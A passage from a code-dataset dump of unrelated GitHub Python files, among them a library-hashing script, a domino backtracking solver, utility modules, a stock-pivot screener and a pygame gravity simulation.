if(''.join( [ x[0] for x in sorted_char_count[:5]]) == checksum):\n sum += int(idnbr)\n\nprint(sum)\n","repo_name":"RFjell/Advent-of-Code","sub_path":"day04/04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"35966220804","text":"import sys\nimport csv\nimport glob\nfrom os.path import exists\nimport subprocess\n\nflutter_file = 'libflutter.so'\nreact_native_file = 'libreact*.so'\n\nflutter_folders = ['arm64-v8a', 'armeabi-v7a', 'x86_64']\nreact_native_folders = flutter_folders + ['x86']\n\n# get the hash of libflutter.so file from arm64_v8a, armeabi_v7a, and x86_64 folders, then write them in the\n# corresponding .csv files.\ndef hash_flutter(version, path):\n path = add_slash_to_path(path)\n\n for folder in flutter_folders:\n csv_file = f'files/flutter/{folder}.csv'\n try:\n output = subprocess.check_output(one_file_command(path + folder + '\\\\' + flutter_file)).decode(\"utf-8\")\n\n start_index = output.find('so:') + 3\n end_index = output.find('CertUtil', start_index)\n output_hash = output[start_index+1: end_index].strip()\n\n finish = False\n versions_list = []\n\n if exists(csv_file):\n with open(csv_file, 'r') as csv_read:\n csv_reader = csv.reader(csv_read)\n for row in csv_reader:\n change = False\n for i in range(len(row)):\n if change:\n row[i] = output_hash\n change = False\n finish = True\n if row[i] == version:\n change = True\n if len(row) != 0:\n versions_list.append(row)\n\n with open(csv_file, 'w', newline='') as csv_write:\n writer = csv.writer(csv_write)\n writer.writerows(versions_list)\n\n if not finish:\n with open(csv_file, 'a') as csv_append:\n csv_append.write(version + ',' + output_hash)\n\n except subprocess.CalledProcessError as e:\n raise RuntimeError(\"Command '{}' return with error (code {}): {}\".format(e.cmd, e.returncode, e.output))\n\n\n# get the hash of libreact*.so file from arm64_v8a, armeabi_v7a, x86, and x86_64 folders, then write them in the\n# corresponding .csv files.\ndef hash_react_native(version, react_native_files):\n for filepath in react_native_files:\n splitted = str(filepath).split('\\\\')\n filename = splitted[len(splitted)-1]\n\n for folder in react_native_folders:\n csv_file = f'files/react_native/{folder}.csv'\n try:\n output = subprocess.check_output(one_file_command(filepath)).decode(\"utf-8\")\n\n start_index = output.find('so:') + 3\n end_index = output.find('CertUtil', start_index)\n output_hash = output[start_index + 1: end_index].strip()\n\n finish = False\n versions_list = []\n\n if exists(csv_file):\n with open(csv_file, 'r') as csv_read:\n csv_reader = csv.reader(csv_read)\n for row in csv_reader:\n change = False\n for i in range(len(row)):\n if change:\n row[i] = output_hash\n change = False\n finish = True\n if row[i] == version and row[i+1] == filename:\n change = True\n if len(row) != 0:\n versions_list.append(row)\n\n with open(csv_file, 'w', newline='') as csv_write:\n writer = csv.writer(csv_write)\n writer.writerows(versions_list)\n\n if not finish:\n with open(csv_file, 'a') as csv_append:\n csv_append.write(f'{version},{filename},{output_hash}')\n\n except subprocess.CalledProcessError as e:\n raise RuntimeError(\"Command '{}' return with error (code {}): {}\".format(e.cmd, e.returncode, e.output))\n\n\ndef one_file_command(filename):\n return 'certutil -hashfile \\\"' + filename + '\\\" SHA256'\n\n\ndef multiple_files_command(path, filename):\n return f'cd {path} && for %F in 
({filename}) do @certutil -hashfile \\\"%F\\\" SHA256'\n\n\ndef add_slash_to_path(path):\n if not path.endswith('\\\\'):\n path += '\\\\'\n return path\n\n\ndef compare_versions(version1: str, version2: str):\n split1 = version1.split('.')\n split2 = version2.split('.')\n if split1[0] < split2[0]:\n return -1\n elif split1[0] > split2[0]:\n return 1\n elif split1[0] == split2[0]:\n if split1[1] < split2[1]:\n return -1\n elif split1[1] > split2[1]:\n return 1\n elif split1[1] == split2[1]:\n if split1[2] < split2[2]:\n return -1\n elif split1[2] > split2[2]:\n return 1\n elif split1[2] == split2[2]:\n return 0\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n raise Exception(f'Please specify the flutter version and the lib path!'\n f'Expected 2 arguments, but was {len(sys.argv)}.\\n'\n f'Make sure there are no spaces in the path.')\n\n path = add_slash_to_path(sys.argv[2])\n\n if exists(path + flutter_folders[0] + '\\\\' + flutter_file):\n hash_flutter(sys.argv[1], sys.argv[2])\n\n if glob.glob(path + react_native_folders[0] + '\\\\' + react_native_file):\n hash_react_native(sys.argv[1], glob.glob(path + react_native_folders[0] + '\\\\' + react_native_file))\n","repo_name":"arianneroselina/Frameworks-Lib-Hashes","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71609994029","text":"from CreateMatrix import create_puzzle\nfrom funciones import *\n\n\ndef backtracking(n):\n \"\"\"\n Funcionalidades: Algoritmo que prueba todas las posibles soluciones de fichas en una matriz de tamaño doble n. Posee una poda que\n al detectar una solución incorrecta, inmediatamente descarta dicha solución y sigue con la siguiente, no termina de evaluarla.\n Entradas: int n\n Salidas: list que contiene en la primera posición la lista de soluciones y en la segunda la matriz generada\n \"\"\"\n print(\"creando matriz\")\n matriz = create_puzzle(n) #MATRIZ ALEATORIA\n cBits = cantidadBits(n)\n listaSoluciones = (posiblesSoluciones(cBits)) #TODAS LAS POSIBLES SOLUCIONES\n listaSolucionesValid = []\n print(\"incio corrida\")\n for solucionAct in listaSoluciones:\n x = 0\n y = 0\n matrizTemp = copy.deepcopy(matriz) #MATRIZ TEMPORAL QUE AYUDARÁ A REGISTRAR LAS POSICIONES USADAS\n try:\n solValida = True\n fichasUsadas = []\n for posFicha in solucionAct: \n while matrizTemp[x][y] == -1: #SE COMPRUEBA SI LA POS ACTUAL FUE USADA\n y+=1 #DE SER ASÍ LA AUMENTA \n if y >= (n+2): #SI LLEGÓ AL LIMITE DE LA MATRIZ (ANCHURA) \n y = 0\n x += 1 #PASA A LA SIGUIENTE FILA\n if int(posFicha) == 0: #CASO FICHA HORIZONTAL\n fichaAct = (matriz[x][y], matriz[x][y+1])\n matrizTemp[x][y] = -1\n matrizTemp[x][y+1] = -1\n y+=2\n else: #CASO FICHA VERTICAL\n fichaAct = (matriz[x][y], matriz[x+1][y])\n matrizTemp[x][y] = -1\n matrizTemp[x+1][y] = -1\n y+=1\n if y >= (n+2): #COMPRUEBA SI SE LLEGÓ AL LÍMITE DE LA MATRIZ\n y = 0\n x += 1 #DE SER ASÍ AUMENTA FILA\n if fichaAct in fichasUsadas or (fichaAct[1],fichaAct[0]) in fichasUsadas: #COMPRUEBA QUE LA FICHA NO HAYA SIDO USADA\n solValida = False #SI YA SE USÓ, DESCARTA LA SOLUCIÓN ACTUAL\n break #DETIENE LA EVALUACIÓN DE LA SOLUCIÓN ACTUAL Y CONTINUA CON LA SIGUIENTE\n fichasUsadas.append(fichaAct)\n if solValida: #AL FINALIZAR LA REVISIÓN DE LA SOLUCIÓN, SI ES VÁLIDA LA AGREGA\n if verificarResultado(matrizTemp): #A LA LISTA DE SOLUCIONES\n listaSolucionesValid.append(solucionAct)\n except:\n \"\"\n print(\"Soluciones válidas:\\n\\n\\n\")\n 
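    # "Soluciones válidas" = "valid solutions"; the bare "" in the except block
    # above is a no-op that silently discards candidate layouts whose piece
    # placements run past the edge of the board (an IndexError)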
print(listaSolucionesValid)\n return [listaSolucionesValid, matriz]","repo_name":"DASBCC/AA_ProyectoDomino","sub_path":"backtracking.py","file_name":"backtracking.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29729923867","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Utility functions shared across the project.\"\"\"\n\nfrom collections import defaultdict\nimport json\nimport logging\nimport os\nimport pickle\n\n\ndef nested_defaultdict():\n \"\"\"Allow to avoid Pickle errors with lambdas.\n\n This function is defined in order to avoid Pickle errors. E.g.:\n\n >>> AttributeError: Can't pickle local object # doctest: +SKIP\n ... 'TwitterCorpusReader.ngram_frequencies..'\n\n Returns:\n a `defaultdict` of integers.\n\n NOTE:\n Functions are pickled by name, not by code. Unpickling will only\n work if a function with the same name is present in in the same\n module. This is why pickling a lambda won't work: they have no\n individual names.\n\n \"\"\"\n return defaultdict(int)\n\ndef merge_dictionaries_summing(first_dict, second_dict):\n \"\"\"Merge two dictionaries summing values with the same key.\n\n Args:\n first_dict (defaultdict): A defaultdict dictionary.\n second_dict (defaultdict): A defaultdict dictionary.\n\n Returns:\n The enriched version of the first dictionary (it works in place). The\n returned object is of type `defaultdict`.\n\n Note:\n This only works only with two input objects for the moment. Later\n improvements could be made, if needed.\n\n \"\"\"\n for k, v in second_dict.items():\n first_dict[k] += v\n return first_dict\n\ndef save_file(content, output_file_path):\n \"\"\"Save content to output file.\n\n The implementation needed to save the specific file type is evaluated\n based on the filename extension.\n\n Args:\n content: The content that has to be stored\n output_file_path (str): The path to the output file where the content\n will be stored.\n\n \"\"\"\n # Detect format from file name\n _, ext = os.path.splitext(output_file_path)\n save = _find_IO_function('save', ext)\n save(content, output_file_path)\n\ndef load_file(file_path):\n \"\"\"Load content from file.\n\n The implementation needed to load the specific file type is evaluated\n based on the filename extension.\n\n Args:\n file_path (str): The path to the file to be loaded.\n\n Returns:\n The loaded file content.\n\n \"\"\"\n # Detect format from file name\n _, ext = os.path.splitext(file_path)\n load = _find_IO_function('load', ext)\n return load(file_path)\n\ndef convert_unknown_arguments(dictionary):\n \"\"\"Convert strings in dictionary to their proper typed values.\n\n Digits are automatically evaluated by json. 
We need to evaluate\n booleans.\n\n Args:\n dictionary (dict): The dictionary whose values need to be converted.\n\n >>> ex_dict = { 'flag': 'true', 'verbose': 'False' }\n >>> convert_unknown_arguments(ex_dict) == {'flag': True, 'verbose': False}\n True\n\n \"\"\"\n if not dictionary:\n return\n for k, v in dictionary.items():\n # if v.isdigit():\n # dictionary[k] = int(v)\n if _is_true(v):\n dictionary[k] = True\n elif _is_false(v):\n dictionary[k] = False\n return dictionary\n\n# Private functions\n\ndef _save_result(result, output_file):\n res_list = []\n # If file does not exist or it is empty\n if not os.path.isfile(output_file) or os.path.getsize(output_file) == 0:\n res_list.append(result)\n with open(output_file, mode='w') as f:\n f.write(json.dumps(result, indent=2))\n else:\n with open(output_file, 'r') as feeds_json:\n previous_results = json.load(feeds_json)\n\n for k, v in result.items():\n if k in previous_results:\n previous_results[k].update(v)\n else:\n previous_results[k] = v\n\n with open(output_file, mode='w') as f:\n f.write(json.dumps(previous_results, indent=2))\n\ndef _save_as_pickle(content, output_file_path):\n logging.info(\"Writing pickle file: %s\", output_file_path)\n pickle.dump(content, open(output_file_path, \"wb\"))\n\ndef _save_as_json(content, output_file_path, indent=2):\n logging.info(\"Writing json file: %s\", output_file_path)\n with open(output_file_path, mode='w') as f:\n f.write(json.dumps(content, indent=indent))\n\ndef _save_generic_file(content, output_file_path):\n with open(output_file_path, 'w') as f:\n f.write(content)\n\ndef _find_IO_function(operation, extension):\n \"\"\"If the extension is supported, return the related saving function for\n that specific file type. Otherwise, return reference to a generic saving\n function. 
Supported `operation` values: 'save', 'load'.\n\n \"\"\"\n return _supported_formats_functions()[operation].get(\n extension, _save_generic_file)\n\ndef _load_json_file(input_file):\n with open(input_file) as in_file:\n result = json.load(in_file)\n return result\n\ndef _load_pickle_file(input_file):\n return pickle.load(open(input_file, \"rb\"))\n\ndef _configure_logger(loglevel):\n \"\"\"Configure logging levels.\"\"\"\n logging.basicConfig(\n format='%(levelname)s : %(message)s', level=logging.DEBUG)\n logging.basicConfig(level=loglevel)\n\n# def _is_number(n):\n# try:\n# float(n)\n# return True\n# except ValueError:\n# return False\n\ndef _is_true(value):\n return value in ['True', 'true']\n\ndef _is_false(value):\n return value in ['False', 'false']\n\ndef _supported_formats_functions():\n return {\n 'save': {\n '.json' : _save_as_json,\n '.pickle': _save_as_pickle\n },\n 'load': {\n '.json' : _load_json_file,\n '.pickle': _load_pickle_file\n }\n }\n","repo_name":"fievelk/pylade","sub_path":"pylade/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5640,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"15528319108","text":"import json\nfrom asyncio import Queue\nfrom enum import Enum\nfrom typing import Optional, Tuple, Any\n\n\nclass JobState:\n def __init__(self):\n self.state = None\n self.q = Queue()\n\n def mark_success(self, value):\n self.state = (True, value)\n self.q.put_nowait(self.state)\n\n def mark_failure(self, reason):\n self.state = (False, reason)\n self.q.put_nowait(self.state)\n\n async def wait_for_value(self):\n return await self.q.get()\n\n\nclass MessageType(Enum):\n Submit = \"SUBMIT\"\n SubmitAck = \"SUBMIT_ACK\"\n Bid = \"BID\"\n BidAck = \"BID_ACK\"\n BidReject = \"BID_REJECT\"\n JobSuccess = \"JOB_SUCCESS\"\n JobFailure = \"JOB_FAILURE\"\n Cancel = \"CANCEL\"\n\n\nclass Message:\n def __init__(self, **attrs):\n if \"type\" in attrs and isinstance(attrs[\"type\"], MessageType):\n attrs[\"type\"] = attrs[\"type\"].value\n self.__raw = attrs\n for k, v in attrs.items():\n setattr(self, k, v)\n\n def is_a(self, message_type: MessageType):\n return hasattr(self, \"type\") and self.type == message_type.value\n\n def get(self, attr, default):\n return getattr(self, attr, default)\n\n @classmethod\n def decode(cls, raw):\n return Message(**json.loads(raw))\n\n def encode(self):\n return json.dumps(self.__raw)\n","repo_name":"bidq/pybidq","sub_path":"bidq/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29528071807","text":"# Here we introduce Data science by starting with a common regression model(logistic regression). The example uses the Iris Dataset\n# We also introduce Python as we develop the model. (The Iris dataset section is adatped from an example from Analyics Vidhya) \n# Python uses some libraries which we load first. 
\n# numpy is used for Array operations\n# mathplotlib is used for visualization\n\nimport numpy as np\nimport matplotlib as mp\nfrom sklearn import datasets\nfrom sklearn import metrics\nfrom sklearn.linear_model import LogisticRegression\n\ndataset = datasets.load_iris()\n\n# Display the data\ndataset\n\n# first we need to understand the data\n\nfrom IPython.display import Image\nfrom IPython.core.display import HTML\nImage(\"https://upload.wikimedia.org/wikipedia/commons/5/56/Kosaciec_szczecinkowaty_Iris_setosa.jpg\")\n\nImage(\"http://www.opengardensblog.futuretext.com/wp-content/uploads/2016/01/iris-dataset-sample.jpg\")\n\n# In statistics, linear regression is an approach for modeling the relationship between a scalar dependent variable y \n# and one or more explanatory variables (or independent variables) denoted X. There are differnt types of regressions that model the\n# relationship between the independent and the dependent variables \n\n# In linear regression, the relationships are modeled using linear predictor functions whose unknown model \n# parameters are estimated from the data. Such models are called linear models.\n\n# In mathematics, a linear combination is an expression constructed from a set of terms by multiplying \n# each term by a constant and adding the results (e.g. a linear combination of x and y would be any expression of the \n# form ax + by, where a and b are constants)\n\n# Linear regression\nImage(\"https://www.biomedware.com/files/documentation/spacestat/Statistics/Multivariate_Modeling/Regression/regression_line.png\")\n\nImage(url=\"http://31.media.tumblr.com/e00b481257fac723638b32271e611a2f/tumblr_inline_ntui2ohGy41sfzcxh_500.gif\")\n\nmodel = LogisticRegression()\nmodel.fit(dataset.data, dataset.target)\n\nexpected = dataset.target\npredicted = model.predict(dataset.data)\n\n# classification metrics report builds a text report showing the main classification metrics\n# In pattern recognition and information retrieval with binary classification, \n# precision (also called positive predictive value) is the fraction of retrieved instances that are relevant, \n# while recall (also known as sensitivity) is the fraction of relevant instances that are retrieved. \n# Both precision and recall are therefore based on an understanding and measure of relevance. \n# Suppose a computer program for recognizing dogs in scenes from a video identifies 7 dogs in a scene containing 9 dogs \n# and some cats. If 4 of the identifications are correct, but 3 are actually cats, the program's precision is 4/7 \n# while its recall is 4/9.\n\n# In statistical analysis of binary classification, the F1 score (also F-score or F-measure) is a measure of a test's accuracy. \n# It considers both the precision p and the recall r of the test to compute the score: \n# p is the number of correct positive results divided by the number of all positive results, \n# and r is the number of correct positive results divided by the number of positive results that should have been returned. \n# The F1 score can be interpreted as a weighted average of the precision and recall\n\nprint(metrics.classification_report(expected, predicted))\n\n# Confusion matrix \n# https://en.wikipedia.org/wiki/Confusion_matrix\n# In the field of machine learning, a confusion matrix is a table layout that allows visualization of the performance \n# of an algorithm, typically a supervised learning one. 
\n# Each column of the matrix represents the instances in a predicted class \n# while each row represents the instances in an actual class (or vice-versa)\n\n# If a classification system has been trained to distinguish between cats, dogs and rabbits, \n# a confusion matrix will summarize the results of testing the algorithm for further inspection. \n# Assuming a sample of 27 animals — 8 cats, 6 dogs, and 13 rabbits, the resulting confusion matrix \n# could look like the table below:\n\nImage(\"http://www.opengardensblog.futuretext.com/wp-content/uploads/2016/01/confusion-matrix.jpg\")\n\n# In this confusion matrix, of the 8 actual cats, the system predicted that three were dogs, \n# and of the six dogs, it predicted that one was a rabbit and two were cats. \n# We can see from the matrix that the system in question has trouble distinguishing between cats and dogs, \n# but can make the distinction between rabbits and other types of animals pretty well. \n# All correct guesses are located in the diagonal of the table, so it's easy to visually \n# inspect the table for errors, as they will be represented by values outside the diagonal.\n\nprint (metrics.confusion_matrix(expected, predicted))\n\nimport pandas as pd\n\nintegers_list = [1,3,5,7,9] # lists are seperated by square brackets\nprint(integers_list)\ntuple_integers = 1,3,5,7,9 #tuples are seperated by commas and are immutable\nprint(tuple_integers)\ntuple_integers[0] = 11\n\n#Python strings can be in single or double quotes\nstring_ds = \"Data Science\"\n\nstring_iot = \"Internet of Things\"\n\nstring_dsiot = string_ds + \" for \" + string_iot\n\nprint (string_dsiot)\n\nlen(string_dsiot)\n\n# sets are unordered collections with no duplicate elements\nprog_languages = set(['Python', 'Java', 'Scala'])\nprog_languages\n\n# Dictionaies are comma seperated key value pairs seperated by braces\ndict_marks = {'John':95, 'Mark': 100, 'Anna': 99}\n\ndict_marks['John']\n\n\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/03 Supervised Learning - 00 Python basics and Logistic Regression.py","file_name":"03 Supervised Learning - 00 Python basics and Logistic Regression.py","file_ext":"py","file_size_in_byte":5565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25674167897","text":"from tensorboardX import SummaryWriter\nimport torch\nimport os\nimport random\nimport matplotlib as mpl\nfrom utils.visualization_util import normalize\n\nmpl.use('Agg')\n\ntry:\n from StringIO import StringIO # Python 2.7\nexcept ImportError:\n from io import BytesIO as StringIO\n\n\nclass ScalarMeanTracker(object):\n def __init__(self) -> None:\n self._sums = {}\n self._counts = {}\n\n def add_scalars(self, scalars):\n for k in scalars:\n if k not in self._sums:\n self._sums[k] = scalars[k]\n self._counts[k] = 1\n else:\n self._sums[k] += scalars[k]\n self._counts[k] += 1\n\n def pop_and_reset(self):\n means = {k: self._sums[k] / self._counts[k] for k in self._sums}\n self._sums = {}\n self._counts = {}\n return means\n\n\nclass LoggingModule(object):\n def __init__(self, args, log_dir):\n print('initializing logger', log_dir)\n if not os.path.exists(log_dir):\n os.makedirs(log_dir)\n self.qualitative_dir = args.qualitative_dir\n self.mode = args.mode\n self.log_writer = SummaryWriter(log_dir=log_dir)\n self.number_of_items_to_visualize = 10\n self.render = args.render\n\n def recursive_write(self, item_to_write, epoch_number, add_to_keys=''):\n if type(item_to_write) == dict:\n for res in 
item_to_write:\n sub_item = item_to_write[res]\n new_translated_key = add_to_keys + '/' + res\n self.recursive_write(sub_item, epoch_number, add_to_keys=new_translated_key)\n elif type(item_to_write) == torch.Tensor and len(item_to_write.shape) == 2:\n seq_len, joint_len = item_to_write.shape\n for seq_ind in range(seq_len):\n sub_item = item_to_write[seq_ind].mean()\n new_translated_key = add_to_keys + '/' + 'seq_ind_{}'.format(seq_ind)\n self.recursive_write(sub_item, epoch_number, add_to_keys=new_translated_key)\n for joint_ind in range(joint_len):\n sub_item = item_to_write[:, joint_ind].mean()\n new_translated_key = add_to_keys + '/' + 'joint_ind_{}'.format(joint_ind)\n self.recursive_write(sub_item, epoch_number, add_to_keys=new_translated_key)\n self.recursive_write(item_to_write.mean(), epoch_number, add_to_keys=add_to_keys + '/' + 'overall')\n elif type(item_to_write) == torch.Tensor and len(item_to_write.shape) == 1:\n seq_len = len(item_to_write) # equal to item_to_write.shape[0]\n for seq_ind in range(seq_len):\n sub_item = item_to_write[seq_ind]\n new_translated_key = add_to_keys + '/' + 'seq_ind_{}'.format(seq_ind)\n self.recursive_write(sub_item, epoch_number, add_to_keys=new_translated_key)\n self.recursive_write(item_to_write.mean(), epoch_number, add_to_keys=add_to_keys + '/' + 'overall')\n else:\n self.log_writer.add_scalar(\n add_to_keys, item_to_write, epoch_number\n )\n\n def subplot_summary(self, subplot_image_sequence, step, add_to_keys):\n sequence_length = len(subplot_image_sequence)\n for seq_index in range(sequence_length):\n output = subplot_image_sequence[seq_index].transpose(2, 0, 1)\n self.log_writer.add_image(tag=\"%s/time_%d_output\" % (add_to_keys, step), img_tensor=output, global_step=step + seq_index)\n\n def image_summary(self, output_images, target_images, step, add_to_keys):\n\n batch_size, sequence_length, _, _, _ = output_images.shape\n\n # img_summaries = []\n batch_to_visualize = random.randint(0, batch_size - 1)\n for seq_index in range(sequence_length):\n output = output_images[batch_to_visualize, seq_index].cpu()\n target = target_images[batch_to_visualize, seq_index].cpu()\n\n output = normalize(output)\n target = normalize(target)\n\n self.log_writer.add_image(tag=\"%s/time_%d_output\" % (add_to_keys, seq_index), img_tensor=output, global_step=step)\n self.log_writer.add_image(tag=\"%s/time_%d_target\" % (add_to_keys, seq_index), img_tensor=target, global_step=step)\n\n def log(self, dict_res, epoch_number, add_to_keys=''):\n for k in dict_res:\n if add_to_keys != '':\n translated_k = k + '/' + add_to_keys\n else:\n translated_k = k\n self.recursive_write(dict_res[k], epoch_number, add_to_keys=translated_k)\n","repo_name":"ehsanik/touchTorch","sub_path":"utils/logging_util.py","file_name":"logging_util.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"38"} +{"seq_id":"1392681233","text":"from Data7 import Data as data\nfrom Scan import Scan as scan\n\nimport datetime\n\nimport pandas as pd\nimport statistics\nimport mplfinance as mpf\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\nimport matplotlib.pyplot as plt\nimport random\nfrom Log3 import Log as log\nfrom multiprocessing import Pool\n\n\n\n\n\nclass Pivot:\n\tdef pivot(df,current, tf, ticker, path):\n\n\n\t\t########################################################################\n\t\t\n\t\tz_filter = 1.5\n\t\tcoef_filter = .5\n\t\t\n\t\t\n\t\tatr= []\n\t\tadr_l = 
14\n\t\tfor j in range(adr_l): \n\t\t\thigh = df.iat[current-j-1,1]\n\t\t\tlow = df.iat[current-j-1,2]\n\t\t\tval = (high - low ) \n\t\t\tatr.append(val)\n\t\tatr = statistics.mean(atr) \n\n\t\ti = 2\n\n\t\tdef MA(df,i,l):\n\t\t\tma = []\n\t\t\tfor j in range(l):\n\t\t\t\tma.append(df.iat[i-j,3])\n\t\t\treturn statistics.mean(ma)\n\n\t\tma = MA(df,current-1,2)\n\t\twhile True:\n\t\t\tprevma = MA(df,current-i,2)\n\t\t\tif ma > prevma or i > 10:\n\t\t\t\tbreak\n\n\t\t\tma = prevma\n\t\t\ti += 1\n\n\t\ti -= 1\n\t\n\t\td = []\n\t\tfor k in range(20):\n\t\t\tc = df.iat[current - 2 - k,3]\n\t\t\to = df.iat[current - 1 - k,0]\n\t\t\td.append(o/c - 1)\n\n\t\tval = df.iat[current,0]/df.iat[current-1,3] - 1\n\t\tz = (val - statistics.mean(d))/statistics.stdev(d)\n\n\t\tcoef = (df.iat[current,0] - df.iat[current-1,3])/(df.iat[current-i,0] - df.iat[current-1,3])\n\t\tsetup = None\n\t\t#if coef > coef_filter and z > z_filter and df.iat[current-2,3] > df.iat[current-1,3] and df.iat[current-2,3] - df.iat[current-2,0] < atr/3 and df.iat[current,0] > df.iat[current-1,0]:\n\t\t#\tsetup = 'P'\n\n\t\tif coef > coef_filter and z < -z_filter and df.iat[current-2,3] < df.iat[current-1,3] and df.iat[current-2,0] - df.iat[current-2,3] < atr/3 and df.iat[current,0] < df.iat[current-1,0]:\n\t\t\tsetup = 'NP'\n\n\t\tmc = mpf.make_marketcolors(up='g',down='r')\n\t\ts = mpf.make_mpf_style(marketcolors=mc)\n\t\tif setup != None:\n\n\t\t\thigh = 0\n\t\t\tlow = df.iat[current-1,2]\n\t\t\tfor i in range(3):\n\t\t\t\tval = df.iat[current-i,0]\n\t\t\t\tif val > high:\n\t\t\t\t\thigh = val\n\t\t\t\t\n\t\t\tval = (high - low)/atr\n\t\t\tif path == None:\n\t\t\t\tmpf.plot(df, type='candle', style=s,title = str(f' {setup} , {round(z,3)} , {coef} '))\n\t\t\telse:\n\t\t\t\tlog.log(df,current, tf, ticker, z, path, setup) \n\n\n\n\nif __name__ == '__main__':\n\n\tdate_list = ['2021-05-20','2023-03-29','2022-11-10','2022-09-13','2022-08-10','2022-07-27',\n\t\t\t\t '2022-11-10','2023-01-06','2023-01-20','2023-01-09']\n\n\tticker_list = ['coin','qqq','qqq','qqq','qqq','qqq',\n\t\t\t\t 'mgni','aehr','nflx','coin']\n\n\n\ttf = 'd'\n\n\ttickers = scan.get().index.to_list()\n\ttest = False\n\tccccc = -1\n\n\n\tstartdate = datetime.date(2020, 1, 1)\n\tenddate = datetime.datetime.now()# - datetime.timedelta(date_buffer)\n \n\n\n\n\tsample = data.get('AAPL',tf)\n\tstart_index = data.findex(sample,startdate) \n\tend_index = data.findex(sample, enddate)\n \n\t#print(f'{start_index} , {end_index}')\n\ttrim = sample[start_index:end_index]\n\tdate_list = trim.index.tolist()\n\n\n\n\n\twhile True:\n\t\tccccc += 1\n\t\ttry:\n\t\t\tif not test:\n\t\t\t\tdh = random.randint(0,len(tickers) - 1)\n\t\t\t\tticker = tickers[dh]\n\t\t\t\tdfg = data.get(ticker)\n\t\t\t\tind = random.randint(0,len(dfg)-1)\n\t\t\t\tdate = dfg.index[ind]\n\t\t\telse:\n\t\t\t\tticker = 'spy'#ticker_list[ccccc]\n\t\t\t\tdate = date_list[ccccc]\n\t\t\tl = 20\n\t\t\tz_filter = 2\n\t\t\tdf = data.get(ticker)\n\t\t\tindex = data.findex(df,date)+1\n\t\t\tdf = df[index - 200:index]\n\t\t\tcurrent = len(df) - 1\n\n\t\t\tdol_vol_l = 5\n\t\t\tdolVol = []\n\t\t\tfor i in range(dol_vol_l):\n\t\t\t\tdolVol.append(df.iat[current-1-i,3]*df.iat[current-1-i,4])\n\t\t\tdolVol = statistics.mean(dolVol) \n\t\t\n\t\t\tvol_filter = 5 * 1000000\n\t\t\tpath = None\n\t\t\tif dolVol > vol_filter:\n\t\t\t\tPivot.pivot(df,current, tf, ticker, 
path)\n\n\n\n\t\texcept:\n\t\t\tpass\n\n\n\n\n","repo_name":"Andrew50/Screener2","sub_path":"Old/pivot.py","file_name":"pivot.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29953317672","text":"n = int(input())\nl = list(map(int, list(input().split())))\n\ns = sum(l)\ntemp = 0\nif n == 2:\n print(abs(l[-1] - l[0]))\n exit(0)\n\nfor i in range(n):\n if temp >= s - temp:\n print(\n min(abs(2*temp-s), abs(2*(temp-l[i-1])-s))\n )\n exit(0)\n temp += l[i]\n\nprint(abs(2*l[-1]-s))\n","repo_name":"N9199/Programacion-Competitiva","sub_path":"ICPCCL/2019/Day 2/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"18527518557","text":"from django.db import models\nfrom Jardin.models import Jardin\nfrom Plante.models import Plante\nclass Contenu(models.Model):\n jardin=models.ForeignKey(Jardin,on_delete=models.CASCADE)\n plante=models.ForeignKey(Plante,on_delete=models.CASCADE)\n qte=models.IntegerField()\n datePlantation=models.DateTimeField(max_length=50)\n def __str__(self):\n return self.datePlantation\n ","repo_name":"NassimEloualydy/Django-App-With-PostgreSql-and-Ajax","sub_path":"Contenu/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71119991472","text":"import pygame\nimport random\nimport time\nimport math\n\nEPS = 1e-12\nCOLLIDE_TREE_MIN_SIZE = 5\n\nFPS = 59\nFPS_TIME = 1. / FPS\nCOLOR_BG = pygame.Color(23, 23, 23)\nPIX_PER_METER = 100\nSCREEN_HEIGHT = 976\nSCREEN_WIDTH = 1688\n\nMU = 0.3\nDOWNWARD_G = 9.8\nINTER_G = 6.67 * 1e-11\n# K_AIR = 1.2258\nK_AIR = 1e10\nKEY_ACC = 25\nKEY_ACC_FOR_ALL = True\nK_ELASTIC = 1e12\n\nRIGID = 5\nDEAD_COUNT = 1\nBALL_COUNT = RIGID * RIGID - 1\n\nDOWNWARD_GRAVITY_ON = False\nINTER_GRAVITY_ON = True\n\nELASTIC_COLLISION_ON = True\n\nAVOID_INTER_SUBMERGE = False\nCANCEL_INTER_GRAVITY_WHEN_COLLIDE = True\nAVOID_EDGE_SUBMERGE = True\n\n# 可以控制的球\nWEIGHT1 = 1e12\n# 不可控制的球\nWEIGHT2 = 1e10\n\nIMG_SRC1 = 'pic/saturn-256.png'\nIMG_SRC2 = 'pic/saturn-48.png'\nRIGID_DIS = 2.0\n\n\nRIGID_ELASTIC_NUM = 0\n\n\ndef get_dis(x1, y1, x2, y2):\n return ((x2 - x1) ** 2 + (y2 - y1) ** 2) ** 0.5\n\n\ndef get_vec(x1, y1, x2, y2):\n vec_x, vec_y = x2 - x1, y2 - y1\n vec_len = 